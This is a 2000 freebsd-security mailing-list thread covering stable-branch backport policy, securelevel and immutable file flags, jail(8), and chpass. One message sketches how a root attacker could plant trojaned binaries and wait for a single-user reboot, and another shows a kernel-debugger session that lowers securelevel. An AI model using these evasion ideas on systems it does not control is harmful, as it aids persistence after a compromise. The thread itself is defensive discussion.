From owner-freebsd-security Wed Oct 4 22:19:46 2000
Delivered-To: freebsd-security@freebsd.org
Received: from dragon.nuxi.com (trang.nuxi.com [209.152.133.57]) by hub.freebsd.org (Postfix) with ESMTP id 1B6C537B503; Wed, 4 Oct 2000 22:19:38 -0700 (PDT)
Received: (from obrien@localhost) by dragon.nuxi.com (8.9.3/8.9.1) id WAA50552; Wed, 4 Oct 2000 22:19:21 -0700 (PDT) (envelope-from obrien)
Date: Wed, 4 Oct 2000 22:19:21 -0700
From: "David O'Brien"
To: Alfred Perlstein
Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/finger finger.c
Message-ID: <20001004221921.F50210@dragon.nuxi.com>
Reply-To: obrien@FreeBSD.ORG
References: <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au> <20001003164236.Q27736@fw.wintelcom.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <20001003164236.Q27736@fw.wintelcom.net>; from bright@wintelcom.net on Tue, Oct 03, 2000 at 04:42:37PM -0700
X-Operating-System: FreeBSD 5.0-CURRENT
Organization: The NUXI BSD group
X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A
X-Pgp-Rsa-Keyid: 1024/34F9F9D5
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Oct 03, 2000 at 04:42:37PM -0700, Alfred Perlstein wrote:
> There's a large difference between kernel and userland here, kernel
> changes need to be backported relatively quickly while userland
> can allow for a longer test period.

Why is that -- I would almost say the opposite as the kernel is [generally] more complex than userland.

--
-- David (obrien@FreeBSD.org)

From owner-freebsd-security Wed Oct 4 22:23:35 2000
Delivered-To: freebsd-security@freebsd.org
Received: from dragon.nuxi.com (trang.nuxi.com [209.152.133.57]) by hub.freebsd.org (Postfix) with ESMTP id BAC2A37B502; Wed, 4 Oct 2000 22:23:29 -0700 (PDT)
Received: (from obrien@localhost) by dragon.nuxi.com (8.9.3/8.9.1) id WAA50572; Wed, 4 Oct 2000 22:23:22 -0700 (PDT) (envelope-from obrien)
Date: Wed, 4 Oct 2000 22:23:21 -0700
From: "David O'Brien"
To: "Jeffrey J. Mountin"
Cc: cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/finger finger.c
Message-ID: <20001004222321.G50210@dragon.nuxi.com>
Reply-To: obrien@FreeBSD.ORG
References: <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <39DA182C.C70ED553@originative.co.uk> <200010031800.MAA27859@harmony.village.org> <20001003162720.D51546@freefall.freebsd.org> <39DAC368.C6C213B7@newsguy.com> <4.3.2.20001004010120.00b1cb50@207.227.119.2>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <4.3.2.20001004010120.00b1cb50@207.227.119.2>; from jeff-ml@mountin.net on Wed, Oct 04, 2000 at 01:35:21AM -0500
X-Operating-System: FreeBSD 5.0-CURRENT
Organization: The NUXI BSD group
X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A
X-Pgp-Rsa-Keyid: 1024/34F9F9D5
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Oct 04, 2000 at 01:35:21AM -0500, Jeffrey J. Mountin wrote:
> > I don't think the comparison is appropriate. The divergence between 3.x
> > and 4.x came at the very beginning of 3.x's life, and it was not merged
> > back because it was too big a change.
>
> Aren't the SMP changes in -current similar and will reduce the amount of
> code that can be backported to -stable with relative ease.

Yes. People have been much worse at kernel MFC'ing than userland. You've had several people who feel qualified to do userland MFC'ing, but few feel qualified to do kernel stuff -- we could get rid of some of the diffs if someone confident in doing so spent a little time on it.
--
-- David (obrien@FreeBSD.org)

From owner-freebsd-security Wed Oct 4 22:32:32 2000
Delivered-To: freebsd-security@freebsd.org
Received: from jason.argos.org (a1-3a105.neo.rr.com [24.93.180.105]) by hub.freebsd.org (Postfix) with ESMTP id F24B037B502 for ; Wed, 4 Oct 2000 22:32:19 -0700 (PDT)
Received: from localhost (mike@localhost) by jason.argos.org (8.10.1/8.10.1) with ESMTP id e955Qxl17940; Thu, 5 Oct 2000 01:27:02 -0400
Date: Thu, 5 Oct 2000 01:26:59 -0400 (EDT)
From: Mike Nowlin
To: Gabriel Ambuehl
Cc: security@FreeBSD.ORG
Subject: Re: Re[2]: BSD chpass (fwd)
In-Reply-To: <12917380571.20001004204942@buz.ch>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Wednesday, October 04, 2000, 12:08:59 PM, you wrote:
> > of the script kid population). A really clever attacker would modify
> > your securelevel settings in rc.conf, reboot the machine making it
> > look like a panic or power surge
>
> What about setting schg for it as well? You'd just need to find a way
> to change it yourself (not sure about it, but it should be changeable
> in single user mode which is fortunately only controllable by the
> console).

Many moons ago, I was poking around in the securelevel "setting" code, and had an idea... (Ding!)

How about some hardware flag (such as a bit on the game port connected to a one-shot 555 timer or something) that, when set, will allow you to lower the secure level w/o rebooting? Hit the button, the bit goes low, and you have 15 seconds to lower the securelevel before the bit goes high again and blocks the change (default action). Could also be wired to the (rather pointless) turbo switch that is still being put on a lot of cases...

Yes? No? Stupid idea?
--mike

From owner-freebsd-security Wed Oct 4 22:41:12 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 8E71337B503 for ; Wed, 4 Oct 2000 22:41:05 -0700 (PDT)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e955emM19869; Wed, 4 Oct 2000 23:40:49 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id XAA54442; Wed, 4 Oct 2000 23:40:48 -0600 (MDT)
Message-Id: <200010050540.XAA54442@harmony.village.org>
To: Mike Nowlin
Subject: Re: Re[2]: BSD chpass (fwd)
Cc: Gabriel Ambuehl , security@FreeBSD.ORG
In-reply-to: Your message of "Thu, 05 Oct 2000 01:26:59 EDT."
References:
Date: Wed, 04 Oct 2000 23:40:48 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Mike Nowlin writes:
: How about some hardware flag (such as a bit on the game port connected to
: a one-shot 555 timer or something) that, when set, will allow you to lower
: the secure level w/o rebooting? Hit the button, the bit goes low, and you
: have 15 seconds to lower the securelevel before the bit goes high again
: and blocks the change (default action). Could also be wired to the
: (rather pointless) turbo switch that is still being put on a lot of
: cases...
:
: Yes? No? Stupid idea?

Usually they are called "Joysticks" :-) One could hack the joy driver to allow this.

Warner

From owner-freebsd-security Wed Oct 4 23:11:36 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 2690C37B503; Wed, 4 Oct 2000 23:11:27 -0700 (PDT)
Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e956BQt12423; Wed, 4 Oct 2000 23:11:26 -0700 (PDT)
Date: Wed, 4 Oct 2000 23:11:26 -0700
From: Alfred Perlstein
To: "David O'Brien"
Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/finger finger.c
Message-ID: <20001004231126.T27736@fw.wintelcom.net>
References: <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au> <20001003164236.Q27736@fw.wintelcom.net> <20001004221921.F50210@dragon.nuxi.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
In-Reply-To: <20001004221921.F50210@dragon.nuxi.com>; from obrien@FreeBSD.ORG on Wed, Oct 04, 2000 at 10:19:21PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

* David O'Brien [001004 22:19] wrote:
> On Tue, Oct 03, 2000 at 04:42:37PM -0700, Alfred Perlstein wrote:
> > There's a large difference between kernel and userland here, kernel
> > changes need to be backported relatively quickly while userland
> > can allow for a longer test period.
>
>
> Why is that -- I would almost say the opposite as the kernel is
> [generally] more complex than userland.

Several reasons:

The kernel is one giant program and keeping it in relative sync is hard. (let's avoid the problems we had with 3.x)

The kernel is more complex than userland, but since it's mostly self contained and doesn't do a lot of string parsing (which is where the majority of these vulnerabilities occur) it is actually easier to see what's going on, at least for me.

There's a much heavier amount of peer review for core subsystems in the kernel. (sometimes it feels like a bit too much)

The complexity of the kernel forces you to understand a great deal more about the internal interactions of various subsystems.

It also does allow us to catch certain errors from our users tracking stable; while not an ideal way to find bugs (and definitely not the preferred way), it's better to have these things reach a wider audience sooner so that the problem can be isolated.
We _can_ back things out and we do have a good track record of
restabilizing once a problem is found.

--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
"I have the heart of a child; I keep it in a jar on my desk."

From owner-freebsd-security Wed Oct 4 23:26:50 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mailer.progressive-comp.com (docs3.abcrs.com [63.238.77.222]) by hub.freebsd.org (Postfix) with ESMTP id A969D37B503 for ; Wed, 4 Oct 2000 23:26:45 -0700 (PDT)
Received: (from docs@localhost) by mailer.progressive-comp.com with id CAA05646; Thu, 5 Oct 2000 02:23:42 -0400
Date: Thu, 5 Oct 2000 02:23:42 -0400
Message-Id: <200010050623.CAA05646@mailer.progressive-comp.com>
From: Hank Leininger
Reply-To: Hank Leininger
To: freebsd-security@FreeBSD.ORG
Subject: Re: BSD chpass (fwd)
X-Shameless-Plug: Check out http://marc.theaimsgroup.com/
X-Warning: This mail posted via a web gateway at marc.theaimsgroup.com
X-Warning: Report any violation of list policy to abuse@progressive-comp.com
X-Posted-By: Hank Leininger
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 2000-10-04, Kris Kennaway wrote:
> On Wed, Oct 04, 2000 at 10:47:15AM -0400, Garrett Wollman wrote:
> > < > > said:
> > > I think you're right.  Which is a good reason why your /usr/bin
> > > should be schg too ;-)
> >
> > Actually, sappnd on all the directories which might be in (or on the
> > way to) root's path would be enough.
> Except you can still just mount a doctored copy over the top of it :-)

Keep in mind that a patient attacker can simply leave an egg and wait for
you to boot single-user.  For instance, suppose /bin is in root's path
before /usr/bin, both are sappnd (but not schg), and we've been careful
with schg'ing rc scripts (and all commands they call), somehow ruled out
other nice mount(2) games, etc.  If one's gotten root on such a system
with securelevel raised, simply place a trojan'ed 'more', 'head', 'tail',
or even 'vi' binary in /bin and wait for the next time the box is rebooted
single-user and root logs in w/o securelevel raised (they could accelerate
matters by subsequently feeding overrun-looking logs to syslog and/or
crashing the box, causing curious admins to boot single-user and
investigate, tail logfiles, etc).  Does everybody type the full path to
every executable they run every time?
Doubtful ;)

I've a feeling I'm (re)stating the obvious, but IMHO securelevels can't
really permanently preserve a system's known-good state in the face of
root compromise unless literally everything you'd ever access w/o
securelevels raised, is fully protected when they are (in which case
you'll effectively have everything interesting RO -- just set the RO
jumper on the drive while you're at it).  Otherwise there will always(?)
be some extra-mile way to circumvent them.

Of course we can devise countermeasures ad-nauseum -- for instance, set
all dirs in root's path to schg and only set sappnd on the "last" one,
and never change the order (silly).  Or from every directory "higher" in
the path than a path'ed command, create a symlink to the right place
(unspeakably ugly, but works ;)  Though you'll still have the 'sl',
'ls-l', etc trojan possibilities either way.

And this isn't to say that I think securelevel efforts are wasted.  The
bar is raised; this is good, period ("how much higher is it when you are
done" is still an open question though IMHO).  Userland integrity
checkers a la tripwire are useful again in a system which can guarantee
a) without a reboot, the kernel cannot be modified nor raw-device disk or
memory access obtained, and b) at least some minimal set of files (the
static binaries, and their config/database files) have not been tampered
with in any way.  Without these, LKM-based rootkits make traditional
integrity checkers pretty useless.

...A system whose integrity checkers are properly preserved can be
expected to work as advertised (until reboot ;).  One which alerted on
the addition of new binaries would detect the above.  Unless the attacker
places the egg and then halts the box quickly enough that the integrity
checker doesn't get a chance to run before the crash, and the admin
checks things out booted to single-user mode, when it may not have
launched yet...
--
Hank Leininger

From owner-freebsd-security Wed Oct 4 23:43:44 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 2286037B502 for ; Wed, 4 Oct 2000 23:43:42 -0700 (PDT)
Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Wed, 4 Oct 2000 23:42:25 -0700
Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e956hPT84928; Wed, 4 Oct 2000 23:43:25 -0700 (PDT) (envelope-from cjc)
Date: Wed, 4 Oct 2000 23:43:25 -0700
From: "Crist J . Clark"
To: "Jacques A. Vidrine" , freebsd-security@freebsd.org
Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL
Message-ID: <20001004234325.E25121@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References: <20001004084729.C25121@149.211.6.64.reflexcom.com> <20001004114308.B23379@hamlet.nectar.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <20001004114308.B23379@hamlet.nectar.com>; from n@nectar.com on Wed, Oct 04, 2000 at 11:43:08AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Oct 04, 2000 at 11:43:08AM -0500, Jacques A. Vidrine wrote:
> On Wed, Oct 04, 2000 at 08:47:29AM -0700, Crist J . Clark wrote:
> > This was posted to BugTraq yesterday. It is a series of patches to
> > restrict certain information from non-priv'ed users.
>
> man jail

I should have put the original author of the scripts in the mail so he
would get the replies. I just posted them since I thought they would be
of interest and was curious about what others thought of the idea. Since
I am not running any multi-user machines right now, they are not of
particular interest to me.

But anyway, jail(8) is a very different beast from the patches. It is
not practical to put each interactive user in a jail for, say, a
several dozen or several hundred user system.
--
Crist J. Clark                           cjclark@alum.mit.edu

From owner-freebsd-security Thu Oct 5 0: 0:58 2000
Delivered-To: freebsd-security@freebsd.org
Received: from dragon.nuxi.com (trang.nuxi.com [209.152.133.57]) by hub.freebsd.org (Postfix) with ESMTP id 042DA37B502; Thu, 5 Oct 2000 00:00:47 -0700 (PDT)
Received: (from obrien@localhost) by dragon.nuxi.com (8.9.3/8.9.1) id AAA56587; Thu, 5 Oct 2000 00:00:45 -0700 (PDT) (envelope-from obrien)
Date: Thu, 5 Oct 2000 00:00:44 -0700
From: "David O'Brien"
To: Alfred Perlstein
Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/finger finger.c
Message-ID: <20001005000044.C56495@dragon.nuxi.com>
Reply-To: obrien@FreeBSD.ORG
References: <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au> <20001003164236.Q27736@fw.wintelcom.net> <20001004221921.F50210@dragon.nuxi.com> <20001004231126.T27736@fw.wintelcom.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <20001004231126.T27736@fw.wintelcom.net>; from bright@wintelcom.net on Wed, Oct 04, 2000 at 11:11:26PM -0700
X-Operating-System: FreeBSD 5.0-CURRENT
Organization: The NUXI BSD group
X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A
X-Pgp-Rsa-Keyid: 1024/34F9F9D5
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Oct 04, 2000 at 11:11:26PM -0700, Alfred Perlstein wrote:
> The kernel is one giant program and keeping it in relative sync is
> hard. (let's avoid the problems we had with 3.x)
>
> The kernel is more complex than userland, but since it's mostly

Yes, and since it is hard, it should not be rushed.  (Not that we've
done a very good job of MFC'ing into RELENG_4).  This thread has the
common theme of being cautious.

> self contained and doesn't do a lot of string parsing (which is
> where the majority of these vulnerabilities occur) it is actually
> easier to see what's going on, at least for me.

ONLY for one class of vulnerabilities -- buffer overflows.  What about
the easy to guess sequence numbers?  Or the whole class of denial of
service.  There are more vulnerabilities in the world than just buffer
overflows.

> The complexity of the kernel forces you to understand a great deal
> more about the internal interactions of various subsystems.
And I can point to a few MFC that happened too fast in kernel code that
caused real problems -- even in RELENG_4.

> We _can_ back things out and we do have a good track record of
> restabilizing once a problem is found.

IMHO, nothing MFC'ed into -stable should ever need to be backed out.
IF the need arises that means we did a very poor job of MFC'ing.

--
-- David  (obrien@FreeBSD.org)

From owner-freebsd-security Thu Oct 5 3: 6:57 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id CEEAD37B502; Thu, 5 Oct 2000 03:06:48 -0700 (PDT)
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id GAA08750; Thu, 5 Oct 2000 06:06:52 -0400 (EDT) (envelope-from rjh@mohawk.net)
Date: Thu, 5 Oct 2000 06:06:52 -0400 (EDT)
From: Ralph Huntington
To: "David O'Brien"
Cc: Paul Richards , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Stable branch
In-Reply-To: <20001004220906.D50210@dragon.nuxi.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> On Tue, Oct 03, 2000 at 11:40:21PM +0100, Paul Richards wrote:
> > Stable would stagnate to some extent, certainly more so than it

On Wed, 4 Oct 2000, David O'Brien wrote:
> I disagree that a stable branch should stagnate to some extent -- so how

Stable branch is very important for production use and should incorporate
bug fixes and security patches, but not feature enhancements. The extent
of support and maintenance for stable should be one major release prior to
the latest release (not current), i.e., since 4.x-RELEASE is the latest,
then 3.x-STABLE should be supported with bug fixes and security patches
until a 5.x-RELEASE is out.

Does this seem unreasonable?  -=r=-

From owner-freebsd-security Thu Oct 5 3:56:49 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail2.netcologne.de (mail2.netcologne.de [194.8.194.103]) by hub.freebsd.org (Postfix) with ESMTP id E0B6237B502 for ; Thu, 5 Oct 2000 03:56:46 -0700 (PDT)
Received: from bagabeedaboo.security.at12.de (dial-213-168-64-127.netcologne.de [213.168.64.127]) by mail2.netcologne.de (8.9.3/8.9.3) with ESMTP id MAA00426; Thu, 5 Oct 2000 12:56:33 +0200 (MET DST)
Received: from localhost (localhost.security.at12.de [127.0.0.1]) by bagabeedaboo.security.at12.de (8.11.0/8.11.0) with ESMTP id e95AuMx01299; Thu, 5 Oct 2000 12:56:22 +0200 (CEST) (envelope-from pherman@frenchfries.net)
Date: Thu, 5 Oct 2000 12:56:22 +0200 (CEST)
From: Paul Herman
To: Warner Losh
Cc: Mike Nowlin , Gabriel Ambuehl , security@FreeBSD.ORG
Subject: Re: Re[2]: BSD chpass (fwd)
In-Reply-To: <200010050540.XAA54442@harmony.village.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 4 Oct 2000, Warner Losh wrote:

> In message Mike Nowlin writes:
> : How about some hardware flag (such as a bit on the game port connected to
> : a one-shot 555 timer or something) that, when set, will allow you to lower
> : the secure level w/o rebooting?
> :
> : Yes?  No?  Stupid idea?
>
> Usually they are called "Joysticks" :-)  One could hack the joy driver
> to allow this.

The joystick definitely has the geek factor going for it, but I just use
DDB:

  bash-2.04$ Debugger("manual escape to debugger")
  Stopped at      Debugger+0x34:  movb    $0,in_Debugger.396
  db> w securelevel 0xffffffff
  securelevel             0x2     =       0xffffffff
  db> c

Who needs sysctl(8)? :-)

-Paul.

From owner-freebsd-security Thu Oct 5 4:55:12 2000
Delivered-To: freebsd-security@freebsd.org
Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id B61E737B503 for ; Thu, 5 Oct 2000 04:55:07 -0700 (PDT)
Received: from ophelia.nectar.com (ophelia.nectar.com [10.5.5.2]) by gw.nectar.com (Postfix) with ESMTP id 943D71925E; Thu, 5 Oct 2000 06:55:06 -0500 (CDT)
Received: (from nectar@localhost) by ophelia.nectar.com (8.9.3/8.9.3) id GAA01278; Thu, 5 Oct 2000 06:56:34 -0500 (CDT) (envelope-from nectar@spawn.nectar.com)
Date: Thu, 5 Oct 2000 06:56:34 -0500
From: "Jacques A. Vidrine"
To: cjclark@alum.mit.edu
Cc: freebsd-security@freebsd.org
Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL
Message-ID: <20001005065634.A1270@ophelia.nectar.com>
Mail-Followup-To: "Jacques A. Vidrine" , cjclark@alum.mit.edu, freebsd-security@freebsd.org
References: <20001004084729.C25121@149.211.6.64.reflexcom.com> <20001004114308.B23379@hamlet.nectar.com> <20001004234325.E25121@149.211.6.64.reflexcom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20001004234325.E25121@149.211.6.64.reflexcom.com>; from cjclark@reflexnet.net on Wed, Oct 04, 2000 at 11:43:25PM -0700
X-Url: http://www.nectar.com/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Oct 04, 2000 at 11:43:25PM -0700, Crist J . Clark wrote:
> But anyway, jail(8) is a very different beast from the patches. It is
> not practical to put each interactive user in a jail for, say, a
> several dozen or several hundred user system.

And why is that?

--
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

From owner-freebsd-security Thu Oct 5 5:25:19 2000
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.doosys.com (smtp.doosys.com [195.64.50.136]) by hub.freebsd.org (Postfix) with ESMTP id 7E7F537B66D for ; Thu, 5 Oct 2000 05:25:15 -0700 (PDT)
Received: from smtp.intra.doosys.com (IDENT:itcsrv-doosys@smtp.intra.doosys.com. [10.10.10.12]) by smtp.doosys.com (8.9.3/8.9.3) with ESMTP id OAA90724; Thu, 5 Oct 2000 14:17:17 +0200 (CEST) (envelope-from Bart_van_Leeuwen@doosys.com)
From: Bart_van_Leeuwen@doosys.com
Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL
To: "Jacques A. Vidrine"
Cc: freebsd-security@freebsd.org
X-Mailer: Lotus Notes Release 5.0.4 June 8, 2000
Message-ID:
Date: Thu, 5 Oct 2000 14:25:11 +0200
X-MIMETrack: Serialize by Router on ITCSRV/DOOSYS(Release 5.0.4a |July 24, 2000) at 10/05/2000 02:25:11 PM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Creating a single jail for a group of interactive users is quite
practical. Creating a separate jail for each individual interactive user
can become impractical, for example due to disk space requirements and the
complexity of the environment for the administrator. One key element in
creating a secure environment is being able to get a decent level of
insight in what is going on in the environment.

Once tools for administrating jails are better developed this picture
might change a bit.

Bart van Leeuwen.
mailto:Bart_van_Leeuwen@doosys.com    http://www.doosys.com/
mailto:bart@ixori.demon.nl            http://www.ixori.demon.nl/

"Jacques A. Vidrine"
Sent by: owner-freebsd-security@FreeBSD.ORG
05-10-2000 13:56

To: cjclark@alum.mit.edu
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL

On Wed, Oct 04, 2000 at 11:43:25PM -0700, Crist J . Clark wrote:
> But anyway, jail(8) is a very different beast from the patches. It is
> not practical to put each interactive user in a jail for, say, a
> several dozen or several hundred user system.

And why is that?
--
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

From owner-freebsd-security Thu Oct 5 6: 3:23 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.rdc1.va.home.com (ha1.rdc1.va.home.com [24.2.32.66]) by hub.freebsd.org (Postfix) with ESMTP id 8D9CB37B66C for ; Thu, 5 Oct 2000 06:03:20 -0700 (PDT)
Received: from athena ([24.3.219.36]) by mail.rdc1.va.home.com (InterMail vM.4.01.03.00 201-229-121) with ESMTP id <20001005130319.QZDA26082.mail.rdc1.va.home.com@athena>; Thu, 5 Oct 2000 06:03:19 -0700
Message-Id: <4.2.2.20001005090906.0639d560@email.eden.rutgers.edu>
X-Sender: damascus@netmail.home.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2
Date: Thu, 05 Oct 2000 09:12:05 -0500
To: dima@unixfreak.org, "Jeffrey J. Mountin"
From: Carroll Kong
Subject: Re: BSD chpass (fwd)
Cc: Dima Dorfman , security@FreeBSD.ORG
In-Reply-To: <20001005002410.309DF1F0A@static.unixfreak.org>
References: <4.3.2.20001004173510.00afd880@207.227.119.2>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 05:24 PM 10/4/00 -0700, Dima Dorfman wrote:
> > At 03:08 AM 10/4/00 -0700, Dima Dorfman wrote:
> >
> > >IMO, the bottom line is, schg can only prevent an attacker if they
> > >don't have a good understanding of the system (which accounts for most
> > >of the script kid population).  A really clever attacker would modify
> > >your securelevel settings in rc.conf, reboot the machine making it
> > >look like a panic or power surge (if they know you exclusively access
> > >it remotely), fool around, then change it back.  Tripwire on a r/o disk
> > >would tell you about it, but you can't do that remotely unless you plan
> > >on never touching any system binaries.  Or am I missing something?
> >
> > And why wouldn't you protect /etc as well.  Then one would rely on
> > physical security to change the security settings.  A real PITA for
> > remote systems, but even that could be worked around with some care to
> > allow changes (reboot still required) and protect the system.
>
>You could, but your system would become almost unmanageable.  Relying
>on going to single user mode to do basic maintenance (say you had
>fingerd on in inetd, but now you want to turn it off in light of the
>recent hole) isn't such a good idea.
>
>In my experience, if doing something is a big hassle, it generally
>doesn't get done.  Say someone discovers a small local DoS in some
>service you're running.  Assuming nobody untrusted has an account, a
>local DoS isn't such a big threat.  Since you have to physically walk
>to the machine, boot it to single user mode (causing minor downtime),
>and change it, you'd probably decide to leave it alone.
>After a while it builds up, and your machine slowly deteriorates(sp?).
>And if you ever can't get to the machine and there's a serious remote
>hole, you're in trouble.
>
>Regards
>
>--
>Dima Dorfman
>Finger dima@unixfreak.org for my public PGP key.

Not sure if this is just extending the problem, but if it is going to be
a reboot box, why not create a special freebsd box that uses an octopus
8-serial port card (for multiple machines) and null modem cables to hook
into these "secured" boxes.  Naturally we would have to treat this box as
a hardened box as well.  (running only sshd and firewalled and cannot
accept console logging requests).

I have heard (ok, sorry I did not test it yet), that the Boot Loader will
automatically call up the serial port -> console drivers.  So this way
you COULD call a reboot and go into single user mode from your special
freebsd console box by using minicom!

If the most part of the annoyance is physical access, it is somewhat
eliminated by my console idea.  Passwords would be secured over the
serial port (clear text, but nowhere to broadcast to), unless someone
was physically tapping, but if he got that far to tap, you are dead meat
anyway.

I should get a null modem in my house to test for the "bootloader showing
up in console" bit.  If you REALLY want full console access like to the
BIOS, there is the netweasel.

So what do you think?  Please respond if there are any flaws in this idea?
-Carroll Kong

From owner-freebsd-security Thu Oct 5 6:26: 1 2000
Delivered-To: freebsd-security@freebsd.org
Received: from news.lucky.net (news.lucky.net [193.193.193.102]) by hub.freebsd.org (Postfix) with ESMTP id C25A737B502 for ; Thu, 5 Oct 2000 06:25:55 -0700 (PDT)
Received: (from mail@localhost) by news.lucky.net (8.Who.Cares/8.Who.Cares) id QJY08438 for freebsd-security@freebsd.org; Thu, 5 Oct 2000 16:25:53 +0300 (envelope-from white@alkar.net)
From: Alex Prohorenko
To: freebsd-security@freebsd.org
Subject: Re: BSD chpass (fwd)
Date: 5 Oct 2000 13:25:08 GMT
Organization: Alkar-Teleport News server
Message-ID: <8rhvfk$12ue$2@pandora.alkar.net>
References: <20001004053422.8A3901F19@static.unixfreak.org>
User-Agent: tin/1.4.4-20000803 ("Vet for the Insane") (UNIX) (FreeBSD/3.5-STABLE (i386))
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Lines: 17
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Dima Dorfman wrote:
>> For those not subscribed to bugtraq, it's time to remove the suid bit on
>> chpass.
> Unfortunately it isn't that easy if you're running with securelevel > 0
> since chpass is installed with the schg (system immutable) flag on by
